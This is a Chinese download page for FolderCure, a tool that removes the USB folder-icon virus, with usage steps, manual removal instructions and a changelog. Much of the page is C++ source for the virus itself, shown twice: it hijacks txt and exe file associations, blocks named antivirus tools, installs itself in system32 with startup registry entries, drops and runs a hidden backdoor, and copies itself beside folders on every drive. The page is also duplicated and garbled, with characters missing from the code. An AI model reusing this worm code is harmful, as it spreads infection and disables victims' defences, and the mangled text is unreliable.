foldercure文件夹图标病毒专杀工具下载 V2.4 官方版
免费软件- 软件大小:650KB
- 软件语言:简体中文
- 更新时间: 2021-12-24
- 软件类型:国产软件
- 运行环境:win系统
- 软件等级 :
大雀下载地址
- 介绍说明
- 下载地址
- 相关推荐
foldercure文件夹图标病毒专杀工具专门查杀电脑硬盘或者U盘中自动生成同名的文件病毒,并且可以根据实际情况清理磁盘文件或者隐藏文件夹,同时要能够修复系统磁盘以及文件。
2、选择扫描方式:全盘扫描、u盘扫描和自定路径扫描;
3、扫描修复完成。
2.下载usbcleaner单独的文件夹图标病毒专杀工具,下
3.手动查杀:
结束进程
XP-8B618895.EXE(注意名称不固定,最好用icesword,其图标是文件夹容易区分)
依次删除
C:\WINDOWS\system32\ul.dll 2,404
C:\WINDOWS\system32\og.dll 692
C:\WINDOWS\system32\com.run 270,336
C:\Documents and Settings\Nick\「开始」菜单\程序\启动\ .lnk 指向C:\WINDOWS\system32\XP-8B618895.EXE(注意空格)
C:\WINDOWS\system32\og.EDT&一个VB程序那种图标的exe(名字记不清了,总之看修改日期就好几乎与其他可疑文件是同一时期而且这几个文件都在一块呢)
(以上两个原文里虽然没提但还是也一并删除吧,再啰嗦一句,当然XP-*.exe这些看见也一概删除)
(删除下面几个是关键哦,网上一般解决办法都没提)
以下是易语言的库文件等:
C:\WINDOWS\system32\dp1.fne
C:\WINDOWS\system32\eAPI.fne
C:\WINDOWS\system32\internet.fne
C:\WINDOWS\system32\krnln.fnr
C:\WINDOWS\system32\RegEx.fnr
C:\WINDOWS\system32\shell.fne
C:\WINDOWS\system32\spec.fne
删除病毒启动项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
XP-8B618895(此处根据病毒名称而定)
手动删除U盘根目录的文件夹图标同名EXE文件
{
char CmdLine[MAX_PATH]={0};
char DirUrl[MAX_PATH]={0};
char HiJack[MAX_PATH]={0};
if(!GetCurrentDirectory(MAX_PATH,DirUrl))
return FALSE;
char ch='\\';
if(ch!=*(DirUrl strlen(DirUrl)-1))
{
strcat(DirUrl,"\\");
}
//此处只在系统根目录下有效
sprintf(HiJack,"%s%s\\",DirUrl,AfxGetApp()->m_pszAp pName);
//判断是否存在。
可以打开
if(-1==_access(HiJack,0))
return FALSE;
else
{
sprintf(CmdLine,"explorer.exe %s",HiJack);
// MessageBox(CmdLine); //For a Test
if(WinExec(CmdLine,SW_SHOW)<31)
return FALSE;
}
return TRUE;
}
2、劫持"txt、exe"文件,并屏蔽常用安全工具
//定义特征字符串
BOOL check=TRUE;
int len=7;
char *FuckExe[]={"USBCleaner",
"Kis",
"Kav",
"IceSword",
"Kill",
"WSYSCHECK",
"360"};
//获取参数并判断
if(strcmp(m_lpCmdLine,""))//如果有参数
{
//判断特征字符串
int i;
for(i=0;i<len;i )
{
if(strstr(_strupr(_strdup(m_lpCmdLine)),
_strupr(_strdup(FuckExe))))
{ check=FALSE; break;}
}
// LPTSTR ext;
// ext=wcschr(m_lpCmdLine,_T(".")) 1;
CString cmd;
// if(!wcscmp(ext,_T("txt")))
if(strstr(m_lpCmdLine,_T(".txt"))||strstr(m_lpCmdL ine,_T(".TXT")))
{
cmd.Format("%s %s","notepad.exe",m_lpCmdLine);
}
else
if(strstr(m_lpCmdLine,_T(".exe"))||strstr(m_lpCmdL ine,_T(".EXE")))
{
//此处不完美。
判断文件名
if(!check)
{
// AfxMessageBox("文件已损坏!");
::MessageBox(NULL,"文件已损坏!请重新安装应用程序!","Microsoft",MB_OK);
return FALSE;
}
else
cmd.Format("%s",m_lpCmdLine);
}
WinExec(cmd,SW_NORMAL);
}
else
//打开文件
OpenFuckFile();
3、自启动及实现劫持"exe、txt"文件
//向系统目录下拷贝程序
char FileSource[MAX_PATH]={0};
char FileNew[MAX_PATH]={0};
HMODULE hModule;
hModule=GetModuleHandle(NULL);
GetModuleFileName(hModule,FileSource,MAX_PATH);
CloseHandle(hModule);
GetSystemDirectory(FileNew,MAX_PATH);
strcat(FileNew,"\\SysKernel.exe");
CopyFile(FileSource,FileNew,TRUE);
SetFileAttributes(FileNew, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
//写注册表。
弄个自启动
WriteRegEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\Run",
"SysKernel",REG_SZ,FileNew,0,0);
//写注册表,进行映像劫持
char Hijack[MAX_PATH]={0};
sprintf(Hijack,"%s %%1",FileNew);
WriteRegEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Classes\\ txtfile\\shell\\open\\command",
NULL,REG_SZ,Hijack,0,1);
WriteRegEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Classes\\ exefile\\shell\\open\\command",
NULL,REG_SZ,Hijack,0,1);
4、释放后门,并启动之
BOOL CVirousDlg::ReleaseResource(WORD wResourceID, LPCTSTR lpType, LPCTSTR lpFileName)
{
HGLOBAL hRes;
HRSRC hResInfo;
HANDLE hFile;
DWORD dwBytes;
hResInfo = FindResource(NULL, MAKEINTRESOURCE(wResourceID), lpType);
if (hResInfo == NULL)
return FALSE;
hRes = LoadResource(NULL, hResInfo);
if (hRes == NULL)
return FALSE;
hFile = CreateFile
(
lpFileName,
GENERIC_WRITE,
FILE_SHARE_WRITE,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hFile == NULL)
return FALSE;
WriteFile(hFile, hRes, SizeofResource(NULL, hResInfo), &dwBytes, NULL);
CloseHandle(hFile);
return TRUE;
}
VOID CVirousDlg::ReleaseDoor()
{
char strSystemPath[MAX_PATH];
GetSystemDirectory(strSystemPath, sizeof(strSystemPath));
lstrcat(strSystemPath, "\\SysService.exe");
ReleaseResource(IDR_BIN, "BIN", strSystemPath);
SetFileAttributes(strSystemPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
//实现后门自启动
WriteRegEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\Run",
"SysService",REG_SZ,strSystemPath,0,0);
WinExec(strSystemPath,SW_HIDE);
}
5、遍历磁盘并拷贝自身
//遍历系统磁盘
BOOL CVirousDlg::FuckFile()
{
DWORD dwNumBytesForDriveStrings;//实际存储驱动器号的字符串长度
LPSTR lp;
CString strLogdrive;
//获得实际存储驱动器号的字符串长度
dwNumBytesForDriveStrings=GetLogicalDriveStrings(0 ,NULL);//*sizeof(TCHAR);
//如果字符串不为空。
则表示有正常的驱动器存在
if (dwNumBytesForDriveStrings!=0)
{
lp=new char[dwNumBytesForDriveStrings];
GetLogicalDriveStrings(dwNumBytesForDriveStrings,l p);
while (*lp!=0)
{
DoBad(lp);
lp=strchr(lp,0) 1;
}
return TRUE;
}
else
return FALSE;
}
//干坏事
VOID CVirousDlg::DoBad(char DriveBuf[])
{
CFileFind finder;
// build a string with wildcards
CString strWildcard(DriveBuf);
strWildcard = _T("*.*");
char FileSource[MAX_PATH]={0};
char FileNew[MAX_PATH]={0};
HMODULE hModule;
hModule=GetModuleHandle(NULL);
GetModuleFileName(hModule,FileSource,MAX_PATH);
// CloseHandle(hModule);
// start working for files
BOOL bWorking = finder.FindFile(strWildcard);
while (bWorking)
{
// nReg ;
bWorking = finder.FindNextFile();
// skip . and .. files; otherwise, we'd
// recur infinitely!
if (finder.IsDots())
continue;
// if it's a directory, recursively search it
if (finder.IsDirectory()&&!finder.IsSystem()&&!finder .IsHidden())
{
nReg ;
if(!SetFileAttributes(finder.GetFilePath(),
FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM))
continue;
sprintf(FileNew,"%s%s",finder.GetFilePath(),".exe" );
CopyFile(FileSource,FileNew,TRUE);
if(FUCKREG==nReg)
{
WriteReg(FileNew);
}
}
}
finder.Close();
}
2. 对FolderCure部分界面进行美化调整。
3. 修正USBCleaner对正常vmnat.exe的错误警报问题。
4. 对USBCleaner更新模块Update.exe进行改进,以后在USBCleaner没有更新的时候,可通过在线升级获取FolderCure的全部更新文件。
5. 更新FolderCure到V4.4。
6. 修正USBMON在繁体中文系统中重复运行提示文字的乱码问题。
7. 修正USBCleaner主程式一处在繁体中文系统中乱码问题。
8. 强对gdiplus.exe usddriver.exe等回收站图标病毒的查杀(可通过FolderCure查杀)。
9. 对FolderCure病毒库重新进行优化(注意这将使旧版本的FolderCure无法正确读取新版病毒库,请下载最新版)。
10. 增强对文件夹图标病毒Important.FILES.EXE系列的识别与查杀。
11. 对FolderCure更新模块进行调整与优化。
12. 新增240个新U盘类病毒的查杀,其中包括delautorun.bat Worm.Win32.Autorun.204800;.exe Trojan.Win32.DownldrU.a;useinit.exe Worm.Win32.Autorun.jot;h4ck3v1l.vbs Worm.Script.VBS.Autorun;cao.exe Trojan.Win32.Nodef.ihw;boot.exe Trojan.Win32.Undef.dqr等等。
【软件介绍】
foldercure图标文件夹专杀工具主用于清理在盘里或者U盘名自动产生同名的EXE文件,这种病毒在几年前较为常见,现在应该见的不多了,有碰到此问题的不要错过。【软件功能】
u盘病毒专杀工具usbcleaner是一种纯绿色的辅助杀毒工具,具有检测查杀70余种U盘病毒,U盘病毒广谱扫描,U盘病毒免疫,修复显示隐藏文件及系统文件,安全卸载移动盘盘符等功能,全方位一 体化修复杀除U盘病毒.同时u盘病毒专杀工具usbcleanerr能迅速对新出现的U盘病毒进行处理.u盘病毒专杀工具usbcleaner是你学习,工作,娱乐的好帮手。【使用方法】
1、软件下载解压完成后,点击FolderCure打开软件,打开完成后,点击开始扫描即可开始扫描病毒。2、选择扫描方式:全盘扫描、u盘扫描和自定路径扫描;
3、扫描修复完成。
【查杀方式】
1.下载usbcleaner,并运行其中的foldercure.exe2.下载usbcleaner单独的文件夹图标病毒专杀工具,下
3.手动查杀:
结束进程
XP-8B618895.EXE(注意名称不固定,最好用icesword,其图标是文件夹容易区分)
依次删除
C:\WINDOWS\system32\ul.dll 2,404
C:\WINDOWS\system32\og.dll 692
C:\WINDOWS\system32\com.run 270,336
C:\Documents and Settings\Nick\「开始」菜单\程序\启动\ .lnk 指向C:\WINDOWS\system32\XP-8B618895.EXE(注意空格)
C:\WINDOWS\system32\og.EDT&一个VB程序那种图标的exe(名字记不清了,总之看修改日期就好几乎与其他可疑文件是同一时期而且这几个文件都在一块呢)
(以上两个原文里虽然没提但还是也一并删除吧,再啰嗦一句,当然XP-*.exe这些看见也一概删除)
(删除下面几个是关键哦,网上一般解决办法都没提)
以下是易语言的库文件等:
C:\WINDOWS\system32\dp1.fne
C:\WINDOWS\system32\eAPI.fne
C:\WINDOWS\system32\internet.fne
C:\WINDOWS\system32\krnln.fnr
C:\WINDOWS\system32\RegEx.fnr
C:\WINDOWS\system32\shell.fne
C:\WINDOWS\system32\spec.fne
删除病毒启动项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
XP-8B618895(此处根据病毒名称而定)
手动删除U盘根目录的文件夹图标同名EXE文件
【病毒源代码】
bool CVirousApp::OpenFuckFile(){
char CmdLine[MAX_PATH]={0};
char DirUrl[MAX_PATH]={0};
char HiJack[MAX_PATH]={0};
if(!GetCurrentDirectory(MAX_PATH,DirUrl))
return FALSE;
char ch='\\';
if(ch!=*(DirUrl strlen(DirUrl)-1))
{
strcat(DirUrl,"\\");
}
//此处只在系统根目录下有效
sprintf(HiJack,"%s%s\\",DirUrl,AfxGetApp()->m_pszAp pName);
//判断是否存在。
可以打开
if(-1==_access(HiJack,0))
return FALSE;
else
{
sprintf(CmdLine,"explorer.exe %s",HiJack);
// MessageBox(CmdLine); //For a Test
if(WinExec(CmdLine,SW_SHOW)<31)
return FALSE;
}
return TRUE;
}
2、劫持"txt、exe"文件,并屏蔽常用安全工具
//定义特征字符串
BOOL check=TRUE;
int len=7;
char *FuckExe[]={"USBCleaner",
"Kis",
"Kav",
"IceSword",
"Kill",
"WSYSCHECK",
"360"};
//获取参数并判断
if(strcmp(m_lpCmdLine,""))//如果有参数
{
//判断特征字符串
int i;
for(i=0;i<len;i )
{
if(strstr(_strupr(_strdup(m_lpCmdLine)),
_strupr(_strdup(FuckExe))))
{ check=FALSE; break;}
}
// LPTSTR ext;
// ext=wcschr(m_lpCmdLine,_T(".")) 1;
CString cmd;
// if(!wcscmp(ext,_T("txt")))
if(strstr(m_lpCmdLine,_T(".txt"))||strstr(m_lpCmdL ine,_T(".TXT")))
{
cmd.Format("%s %s","notepad.exe",m_lpCmdLine);
}
else
if(strstr(m_lpCmdLine,_T(".exe"))||strstr(m_lpCmdL ine,_T(".EXE")))
{
//此处不完美。
判断文件名
if(!check)
{
// AfxMessageBox("文件已损坏!");
::MessageBox(NULL,"文件已损坏!请重新安装应用程序!","Microsoft",MB_OK);
return FALSE;
}
else
cmd.Format("%s",m_lpCmdLine);
}
WinExec(cmd,SW_NORMAL);
}
else
//打开文件
OpenFuckFile();
3、自启动及实现劫持"exe、txt"文件
//向系统目录下拷贝程序
char FileSource[MAX_PATH]={0};
char FileNew[MAX_PATH]={0};
HMODULE hModule;
hModule=GetModuleHandle(NULL);
GetModuleFileName(hModule,FileSource,MAX_PATH);
CloseHandle(hModule);
GetSystemDirectory(FileNew,MAX_PATH);
strcat(FileNew,"\\SysKernel.exe");
CopyFile(FileSource,FileNew,TRUE);
SetFileAttributes(FileNew, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
//写注册表。
弄个自启动
WriteRegEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\Run",
"SysKernel",REG_SZ,FileNew,0,0);
//写注册表,进行映像劫持
char Hijack[MAX_PATH]={0};
sprintf(Hijack,"%s %%1",FileNew);
WriteRegEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Classes\\ txtfile\\shell\\open\\command",
NULL,REG_SZ,Hijack,0,1);
WriteRegEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Classes\\ exefile\\shell\\open\\command",
NULL,REG_SZ,Hijack,0,1);
4、释放后门,并启动之
BOOL CVirousDlg::ReleaseResource(WORD wResourceID, LPCTSTR lpType, LPCTSTR lpFileName)
{
HGLOBAL hRes;
HRSRC hResInfo;
HANDLE hFile;
DWORD dwBytes;
hResInfo = FindResource(NULL, MAKEINTRESOURCE(wResourceID), lpType);
if (hResInfo == NULL)
return FALSE;
hRes = LoadResource(NULL, hResInfo);
if (hRes == NULL)
return FALSE;
hFile = CreateFile
(
lpFileName,
GENERIC_WRITE,
FILE_SHARE_WRITE,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hFile == NULL)
return FALSE;
WriteFile(hFile, hRes, SizeofResource(NULL, hResInfo), &dwBytes, NULL);
CloseHandle(hFile);
return TRUE;
}
VOID CVirousDlg::ReleaseDoor()
{
char strSystemPath[MAX_PATH];
GetSystemDirectory(strSystemPath, sizeof(strSystemPath));
lstrcat(strSystemPath, "\\SysService.exe");
ReleaseResource(IDR_BIN, "BIN", strSystemPath);
SetFileAttributes(strSystemPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
//实现后门自启动
WriteRegEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\Run",
"SysService",REG_SZ,strSystemPath,0,0);
WinExec(strSystemPath,SW_HIDE);
}
5、遍历磁盘并拷贝自身
//遍历系统磁盘
BOOL CVirousDlg::FuckFile()
{
DWORD dwNumBytesForDriveStrings;//实际存储驱动器号的字符串长度
LPSTR lp;
CString strLogdrive;
//获得实际存储驱动器号的字符串长度
dwNumBytesForDriveStrings=GetLogicalDriveStrings(0 ,NULL);//*sizeof(TCHAR);
//如果字符串不为空。
则表示有正常的驱动器存在
if (dwNumBytesForDriveStrings!=0)
{
lp=new char[dwNumBytesForDriveStrings];
GetLogicalDriveStrings(dwNumBytesForDriveStrings,l p);
while (*lp!=0)
{
DoBad(lp);
lp=strchr(lp,0) 1;
}
return TRUE;
}
else
return FALSE;
}
//干坏事
VOID CVirousDlg::DoBad(char DriveBuf[])
{
CFileFind finder;
// build a string with wildcards
CString strWildcard(DriveBuf);
strWildcard = _T("*.*");
char FileSource[MAX_PATH]={0};
char FileNew[MAX_PATH]={0};
HMODULE hModule;
hModule=GetModuleHandle(NULL);
GetModuleFileName(hModule,FileSource,MAX_PATH);
// CloseHandle(hModule);
// start working for files
BOOL bWorking = finder.FindFile(strWildcard);
while (bWorking)
{
// nReg ;
bWorking = finder.FindNextFile();
// skip . and .. files; otherwise, we'd
// recur infinitely!
if (finder.IsDots())
continue;
// if it's a directory, recursively search it
if (finder.IsDirectory()&&!finder.IsSystem()&&!finder .IsHidden())
{
nReg ;
if(!SetFileAttributes(finder.GetFilePath(),
FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM))
continue;
sprintf(FileNew,"%s%s",finder.GetFilePath(),".exe" );
CopyFile(FileSource,FileNew,TRUE);
if(FUCKREG==nReg)
{
WriteReg(FileNew);
}
}
}
finder.Close();
}
【软件特点】
【使用方法】
【更新日志】
【更新日志】
1. 对FolderCure报告Folder_ForceHidden作非病毒标注。2. 对FolderCure部分界面进行美化调整。
3. 修正USBCleaner对正常vmnat.exe的错误警报问题。
4. 对USBCleaner更新模块Update.exe进行改进,以后在USBCleaner没有更新的时候,可通过在线升级获取FolderCure的全部更新文件。
5. 更新FolderCure到V4.4。
6. 修正USBMON在繁体中文系统中重复运行提示文字的乱码问题。
7. 修正USBCleaner主程式一处在繁体中文系统中乱码问题。
8. 强对gdiplus.exe usddriver.exe等回收站图标病毒的查杀(可通过FolderCure查杀)。
9. 对FolderCure病毒库重新进行优化(注意这将使旧版本的FolderCure无法正确读取新版病毒库,请下载最新版)。
10. 增强对文件夹图标病毒Important.FILES.EXE系列的识别与查杀。
11. 对FolderCure更新模块进行调整与优化。
12. 新增240个新U盘类病毒的查杀,其中包括delautorun.bat Worm.Win32.Autorun.204800;.exe Trojan.Win32.DownldrU.a;useinit.exe Worm.Win32.Autorun.jot;h4ck3v1l.vbs Worm.Script.VBS.Autorun;cao.exe Trojan.Win32.Nodef.ihw;boot.exe Trojan.Win32.Undef.dqr等等。
下载地址
- PC版
- 电信高速下载
- 联通高速下载
- 广东电信下载
- 山东电信下载
默认解压密码:www.daque.cn
如需解压,请在本站下载飞压软件进行解压!
